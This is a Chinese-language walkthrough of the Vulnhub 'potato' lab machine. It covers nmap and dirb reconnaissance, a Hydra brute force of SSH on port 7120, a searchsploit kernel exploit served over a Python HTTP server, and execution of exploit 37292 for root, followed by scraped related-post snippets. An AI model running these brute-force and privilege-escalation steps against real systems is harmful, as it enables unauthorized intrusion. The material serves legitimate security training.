Vulnhub---potato
目录
- Vulnhub---potato
- 信息收集
- 扫描目标网段
- 扫描端口
- 访问网站
- 扫描网站目录
- 发现漏洞
- ssh利用
- Hydra破解ssh
- 登陆
- 查看内核版本
- 开启http服务
Vulnhub—potato
靶机下载地址:https://www.vulnhub.com/entry/potato-suncsr-1,556/
信息收集
扫描目标网段
nmap -sP 172.16.58.0/24
扫描端口
nmap -sS -sV -p- -v 172.16.58.130
访问网站
172.16.58.130
扫描网站目录
dirb http://172.16.58.130
发现漏洞
访问扫描出来的网址
http://192.168.232.188/info.php
这条路行不通,重新分析7120端口,利用ssh服务破解
ssh利用
Hydra破解ssh
hydra -l potato -P top1000.txt -vV ssh://172.16.58.130:7120
登陆
使用破解出来的账号密码进行登录
ssh potato@172.16.58.130 -p 7120
查看内核版本
uname -a
另起一个终端
searchsploit ubuntu 3.13.0-24
进入到该目录下编译poc
编译完成后放在/var/www/html/目录下,进该目录查看一下。
开启http服务
python -m SimpleHTTPServer 8000
回到shell将编译好的文件下载到potato中
查看权限,赋予权限,执行文件,然后拿到权限
ls -l
chmod +x 37292
./37292
Vulnhub---potato相关推荐
- vulnhub potato
vulnhub potato(难度:简单) 知识点 一 信息收集 二 从7120端口突破 三 爆破 linux内核提权 知识点 一 nmap的使用 二 SSH爆破 三 漏洞库的利用 四 LINUX内核 ...
- vulnhub Potato: 1
渗透思路: nmap扫描端口 ---- ftp匿名登录下载网站代码 ---- gobuster扫描网站目录 ---- 利用php type juggling漏洞登录网站 ---- 利用LFI获取/et ...
- VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- Potato的暑期训练day#1题解 ——毒瘤构造
Potato的暑期训练day#1 --毒瘤构造 题目链接: A.https://vjudge.net/problem/HDU-1214 B.https://vjudge.net/problem/Cod ...
最新文章
- mybait 转换失败 null处理
- @SpringBootApplication(exclude={DataSourceAutoConfiguration.class})注解作用
- 1.9编程基础之顺序查找 01查找特定的值
- 为什么阿里巴巴要求 POJO 中不能使用基本数据类型?
- TextView中实现部分文字点击
- 【LeetCode】剑指 Offer 42. 连续子数组的最大和
- java 微信二次分享_微信二次分享
- Opengl编程指南第二章:状态管理、几何绘图
- 餐饮为什么很难做到薄利多销?
- python中隔行输出_在Python中的分隔行上打印列表元素
- python的zip_python中的zip()函数
- GitHub使用笔记
- 利用python画一些简单图像
- ae导出html,AE导出json格式的Web动画工具 Bodymovin v5.6.1 + 使用教程
- Java验证导入excel格式
- 【历史上的今天】9 月 21 日:世界上第一部商用移动电话;苹果发布 iPhone 5 ;Mini-SATA 研制成功
- 只需操作这三步,轻松找回电脑上被删除的文件
- Ubuntu下安装LXDE+XRDP实现远程桌面访问(最轻量级桌面)
- Python多态与鸭子类型
- Linux如何关闭防火墙?